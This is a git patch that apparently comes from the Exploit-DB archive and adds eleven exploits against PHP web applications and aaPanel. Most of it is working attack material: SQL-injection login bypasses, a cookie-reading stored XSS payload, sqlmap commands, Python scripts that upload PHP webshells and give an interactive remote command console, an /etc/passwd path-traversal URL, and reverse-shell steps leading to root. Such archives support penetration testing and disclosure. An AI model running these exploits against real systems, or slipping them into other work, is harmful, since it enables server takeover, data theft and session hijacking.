From 97ece9d27bf3a7da1304cdf2c62b3d3895c76a90 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 17 Oct 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-10-17

11 changes to exploits/shellcodes

Employee Management System 1.0 - Cross Site Scripting (Stored)
Employee Management System 1.0 - Authentication Bypass
Alumni Management System 1.0 - Authentication Bypass
Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)
aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)
Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)
Hotel Management System 1.0 - Remote Code Execution (Authenticated)
Seat Reservation System 1.0 - Unauthenticated SQL Injection
CS-Cart 1.3.3 - 'classes_dir' LFI
CS-Cart 1.3.3 - authenticated RCE
---
 exploits/php/webapps/48881.txt    |  85 ++++++++++++++++++++++
 exploits/php/webapps/48882.txt    |  35 +++++++++
 exploits/php/webapps/48883.txt    |  35 +++++++++
 exploits/php/webapps/48884.txt    |  31 ++++++++
 exploits/php/webapps/48885.txt    |  56 +++++++++++++++
 exploits/php/webapps/48887.py     |  61 ++++++++++++++++
 exploits/php/webapps/48888.py     | 116 ++++++++++++++++++++++++++++++
 exploits/php/webapps/48889.txt    |  42 +++++++++++
 exploits/php/webapps/48890.txt    |  12 ++++
 exploits/php/webapps/48891.txt    |  15 ++++
 exploits/python/webapps/48886.txt |  23 ++++++
 files_exploits.csv                |  11 +++
 12 files changed, 522 insertions(+)
 create mode 100644 exploits/php/webapps/48881.txt
 create mode 100644 exploits/php/webapps/48882.txt
 create mode 100644 exploits/php/webapps/48883.txt
 create mode 100644 exploits/php/webapps/48884.txt
 create mode 100644 exploits/php/webapps/48885.txt
 create mode 100755 exploits/php/webapps/48887.py
 create mode 100755 exploits/php/webapps/48888.py
 create mode 100644 exploits/php/webapps/48889.txt
 create mode 100644 exploits/php/webapps/48890.txt
 create mode 100644 exploits/php/webapps/48891.txt
 create mode 100644 exploits/python/webapps/48886.txt

diff --git a/exploits/php/webapps/48881.txt b/exploits/php/webapps/48881.txt
new file mode 100644
index 000000000..97745746b
--- /dev/null
+++ b/exploits/php/webapps/48881.txt
@@ -0,0 +1,85 @@
+#Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL localhost:8081/Employee Management System/addemp.php
+
+Step 2: Use payload <img src=x onerror=alert(document.cookie)> in First Name and Last Name.
+
+
+Malicious Request:::
+
+POST /Employee%20Management%20System/////process/addempprocess.php HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3267707159765331982713791736
+Content-Length: 1571
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/Employee%20Management%20System/////addemp.php
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="firstName"
+
+<img src=x onerror=alert(document.cookie)>
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="lastName"
+
+<img src=x onerror=alert(document.cookie)>
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="email"
+
+abc@gmail.com
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="birthday"
+
+2020-09-28
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="contact"
+
+9876543211
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="nid"
+
+12
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="address"
+
+Gujarat
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="dept"
+
+CS
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="degree"
+
+BE
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="salary"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3267707159765331982713791736--
+
+
+Cookie will be reflected on View Employee.
\ No newline at end of file
diff --git a/exploits/php/webapps/48882.txt b/exploits/php/webapps/48882.txt
new file mode 100644
index 000000000..0c9c27c4f
--- /dev/null
+++ b/exploits/php/webapps/48882.txt
@@ -0,0 +1,35 @@
+#Exploit Title: Employee Management System 1.0 - Authentication Bypass
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/Employee%20Management%20System/alogin.html
+
+Step 2: Use payload anki' or 1=1# for both username and password.
+
+
+Malicious Request:::
+
+POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 70
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+Upgrade-Insecure-Requests: 1
+
+mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
+
+You will be login as Admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48883.txt b/exploits/php/webapps/48883.txt
new file mode 100644
index 000000000..d6258979e
--- /dev/null
+++ b/exploits/php/webapps/48883.txt
@@ -0,0 +1,35 @@
+#Exploit Title: Alumni Management System 1.0 - Authentication Bypass
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1:	Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php 
+
+Step 2:	use payload anki' or 1=1# for both username and password.
+
+
+Malicious Request:::
+
+POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 53
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+
+username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23
+
+You will be login as admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48884.txt b/exploits/php/webapps/48884.txt
new file mode 100644
index 000000000..cbd9d9833
--- /dev/null
+++ b/exploits/php/webapps/48884.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
+# Date: 16/10/2020
+# Exploit Author: Oğuz Türkgenç
+# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
+# Version: 1.0
+# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
+
+Step 1: Open the URL http://localhost/cvms/index.php
+
+Step 2: use payload ot' or 1=1# in user and password field
+
+Malicious Request
+
+POST /cvms/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.175.128/cvms/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://localhost
+Connection: close
+Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660
+Upgrade-Insecure-Requests: 1
+
+username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login=
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/48885.txt b/exploits/php/webapps/48885.txt
new file mode 100644
index 000000000..ecc98b5e1
--- /dev/null
+++ b/exploits/php/webapps/48885.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)
+# Date: 2020-10-05
+# Exploit Author: b1nary
+# Vendor Homepage: https://www.sourcecodester.com/php/14482/restaurant-reservation-system-php-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/restaurants_3.zip
+# Version: 1.0
+# Tested on: Linux + Apache2
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+Restaurant Reservation System 1.0 allows SQL Injection via parameter 'date' in
+includes/reservation.inc.php. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'date' parameter and save it like re.req. Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r re.req --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+fname=user&lname=user&date=2020-10-14' AND (SELECT 1934 FROM (SELECT(SLEEP(5)))lmWi) AND 
+'navS'='navS&time=16:00 - 20:00&num_guests=2&tele=123456789&comments=null&reserv-submit=
+
+
+4. Burpsuite request:
+----------------------
+
+POST /restaurant/includes/reservation.inc.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer: http://127.0.0.1/restaurant/reservation.php
+Cookie: PHPSESSID=r355njdkuddu4ac0a784i9i69m
+Upgrade-Insecure-Requests: 1
+
+fname=user&lname=user&date=2020-10-14&time=16%3A00+-+20%3A00&num_guests=2&tele=123456789&comments=null&reserv-submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/48887.py b/exploits/php/webapps/48887.py
new file mode 100755
index 000000000..9e57eba80
--- /dev/null
+++ b/exploits/php/webapps/48887.py
@@ -0,0 +1,61 @@
+# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# Exploit Tested Using: Python 2.7.18
+# CVE: CVE-2020-25763
+# Vulnerability Description: 
+# Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.
+
+import requests, sys, urllib, re
+from lxml import etree
+from io import StringIO
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+import random
+import string
+
+def print_usage(STRING):
+    return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
+        print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
+    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
+    random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])
+    webshell = random+'.php'
+
+    s = requests.Session()
+    s.get(SERVER_URL, verify=False)
+    image     = {
+                'cover': 
+                  (
+                    webshell, 
+                    '<?php echo shell_exec($_GET["d3crypt"]); ?>', 
+                    'application/php', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    fdata   = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
+    r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
+    r2 = s.get(SERVER_URL, verify=False)
+    response_page = r2.content.decode("utf-8")
+    parser = etree.HTMLParser()
+    tree = etree.parse(StringIO(response_page), parser=parser)
+    def get_links(tree):
+        refs = tree.xpath("//img")
+        links = [link.get('src', '') for link in refs]
+        return [l for l in links]
+
+    links = get_links(tree)
+    print('Access your webshell at: ')    
+    for link in links:
+        if webshell in link:
+            print(SERVER_URL + link+'?d3crypt=whoami')
\ No newline at end of file
diff --git a/exploits/php/webapps/48888.py b/exploits/php/webapps/48888.py
new file mode 100755
index 000000000..f8e78c966
--- /dev/null
+++ b/exploits/php/webapps/48888.py
@@ -0,0 +1,116 @@
+# Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-09-23
+# Exploit Author: Eren Şimşek
+# Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip
+# Version: 1.0
+# Tested on: Windows/Linux - XAMPP Server
+# CVE : N/A
+
+# Setup: pip3 install bs4 .
+
+# Exploit Code :
+
+import requests,sys,string,random
+from bs4 import BeautifulSoup
+
+def get_random_string(length):
+letters = string.ascii_lowercase
+result_str = ''.join(random.choice(letters) for i in range(length))
+return result_str
+
+session = requests.session()
+Domain = ""
+RandomFileName = get_random_string(5)+".php"
+def Help():
+print("[?] Usage: python AporlorRCE.py <Domain>")
+
+def Upload():
+burp0_url = Domain+"/admin/ajax.php?action=save_category"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
+"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
+http://192.168.1.104/admin/index.php?page=categories", "X-Requested-With":
+"XMLHttpRequest", "Content-Type": "multipart/form-data;
+boundary=---------------------------11915271121184037197158049421",
+"Connection": "close"}
+burp0_data = "-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"id\"\r\n\r\n\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"name\"\r\n\r\n1\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"price\"\r\n\r\n1\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type:
+application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n
+-----------------------------11915271121184037197158049421--\r\n"
+try:
+Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
+if Resp.text == "1":
+print("[+] Shell Upload Success")
+else:
+print("[-] Shell Upload Failed")
+except:
+print("[-] Request Failed")
+Help()
+
+def Login():
+burp0_url = Domain+"/admin/ajax.php?action=login"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
+"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
+http://localhost/fos/admin/login.php", "Content-Type":
+"application/x-www-form-urlencoded;
+charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
+try:
+Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
+if Resp.text == "1":
+print("[+] Login Success")
+else:
+print("[+] Login Failed")
+except:
+print("[-] Request Failed")
+Help()
+
+def FoundMyRCE():
+global FileName
+burp0_url = Domain+"/admin/index.php?page=categories"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept":
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip,
+deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+try:
+Resp = session.get(burp0_url, headers=burp0_headers)
+Soup = BeautifulSoup(Resp.text, "html5lib")
+Data = Soup.find_all("img")
+for MyRCE in Data:
+if RandomFileName in MyRCE["src"]:
+FileName = MyRCE["src"].strip("../assets/img/")
+print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
+except:
+print("[-] Request Failed")
+Help()
+
+def Terminal():
+while True:
+Command = input("Console: ")
+burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
+try:
+Resp = session.get(burp0_url)
+print(Resp.text)
+except KeyboardInterrupt:
+print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
+except:
+print("[-] Request Error")
+if __name__ == "__main__":
+if len(sys.argv) == 2:
+Domain = sys.argv[1]
+Login()
+Upload()
+FoundMyRCE()
+Terminal()
+else:
+Help()
\ No newline at end of file
diff --git a/exploits/php/webapps/48889.txt b/exploits/php/webapps/48889.txt
new file mode 100644
index 000000000..a047c0d48
--- /dev/null
+++ b/exploits/php/webapps/48889.txt
@@ -0,0 +1,42 @@
+# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25762
+# Description
+
+The file admin_class.php does not perform input validation on the username and password parameters. An attacker can send malicious input in the post request to /admin/ajax.php?action=login and bypass authentication, extract sensitive information etc.
+
+#POC
+
+1) Navigate to the admin login page
+
+Example:
+
+http://192.168.1.72/seat_reservation/admin/login.php
+
+2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool
+
+3) Save the request to file. Example, seat_reservation_sqli.req
+
+POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Origin: http://192.168.1.72
+DNT: 1
+Connection: close
+
+username=admin&password=dummy
+
+4) Run SQLmap on the file,
+
+sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/48890.txt b/exploits/php/webapps/48890.txt
new file mode 100644
index 000000000..51988b22a
--- /dev/null
+++ b/exploits/php/webapps/48890.txt
@@ -0,0 +1,12 @@
+# Exploit Title: CS-Cart unauthenticated LFI
+# Date: 2020-09-22
+# Exploit Author:  0xmmnbassel
+# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
+# Tested at: ver. 1.3.4
+# Vulnerability Type: unauthenticated LFI
+
+
+http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
+example: 
+http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
+http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/exploits/php/webapps/48891.txt b/exploits/php/webapps/48891.txt
new file mode 100644
index 000000000..f4b71d5c0
--- /dev/null
+++ b/exploits/php/webapps/48891.txt
@@ -0,0 +1,15 @@
+# Exploit Title: CS-Cart authenticated RCE
+# Date: 2020-09-22
+# Exploit Author:  0xmmnbassel
+# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
+# Tested at: ver. 1.3.3
+# Vulnerability Type: authenticated RCE
+
+
+
+get PHP shells from
+http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+edit IP && PORT
+Upload to file manager
+change the extension from .php to .phtml
+visit http://[victim]/skins/shell.phtml --> Profit. ...!
\ No newline at end of file
diff --git a/exploits/python/webapps/48886.txt b/exploits/python/webapps/48886.txt
new file mode 100644
index 000000000..176cbbab1
--- /dev/null
+++ b/exploits/python/webapps/48886.txt
@@ -0,0 +1,23 @@
+# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation]
+# Google Dork: []
+# Date: [04.05.2020]
+# Exploit Author: [Ünsal Furkan Harani (Zemarkhos)]
+# Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/)
+# Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel)
+# Version: [6.6.6] (REQUIRED)
+# Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux]
+# CVE : [CVE-2020-14421]
+
+if you are logged was admin;
+
+1- go to the crontab
+
+2- select shell script and paste your reverse shell code
+
+3- click execute button and you are now root.
+
+because crontab.py running with root privileges.
+
+Remote Code Execution
+
+https://github.com/jenaye/aapanel
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5d94c7df3..df3f74600 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40699,6 +40699,17 @@ id,file,description,date,author,type,platform,port
 48878,exploits/php/webapps/48878.py,"rConfig 3.9.5 - Remote Code Execution (Unauthenticated)",2020-10-15,"Daniel Monzón",webapps,php,
 48879,exploits/php/webapps/48879.txt,"Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass",2020-10-15,"Saurav Shukla",webapps,php,
 48880,exploits/php/webapps/48880.txt,"Zoo Management System 1.0 - Authentication Bypass",2020-10-15,"Jyotsna Adhana",webapps,php,
+48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,
+48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,
+48883,exploits/php/webapps/48883.txt,"Alumni Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,
+48884,exploits/php/webapps/48884.txt,"Company Visitor Management System (CVMS) 1.0 - Authentication Bypass",2020-10-16,"Oğuz Türkgenç",webapps,php,
+48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,
+48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,
+48887,exploits/php/webapps/48887.py,"Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2020-10-16,"Rahul Ramkumar",webapps,php,
+48888,exploits/php/webapps/48888.py,"Hotel Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-16,Aporlorxl23,webapps,php,
+48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php,
+48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php,
+48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,